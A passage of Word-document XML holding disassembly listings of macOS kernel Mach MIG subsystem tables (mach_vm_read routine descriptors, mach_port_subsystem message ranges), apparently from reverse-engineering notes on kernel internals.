          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 6FFFFFF80h           ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 2Ch                  ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E03EF8                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq offset _Xmach_vm_read; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 7                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 4000000000h          ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 3AABC000000000h      ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 0FFFFFF80h           ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 db 3, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 3                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 102Ch                ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 3AADA0h              ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 db 80h, 3 dup(0FFh)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 5FFFFFF80h           ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 2Ch                  ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E03EF8                 db 10h, 0AFh, 3Ah, 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mach_port_subsystem()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>const:FFFFFF8000E03938 ; const mach_port_subsystem mach_port_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938 mach_port_subsystem_0 dq offset mach_port_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                                         ; DATA XREF: mach_port_server_routine:loc_FFFFFF80003A5742o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                                         ; mach_port_server+80o ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E03938                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C7C">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0C80h</w:t>
      </w:r>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E03938                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2C7C">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0CA4h</w:t>
      </w:r>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dd 80h                  ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dq offset _Xmach_port_names; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dd 5                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dd 54h                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dq 3A5A0000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dd 3                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 db 30h, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E03938                 dq 30h                  ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dd 3A5BB0h              ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dq 3                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="0027225E" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027225E">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03938                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
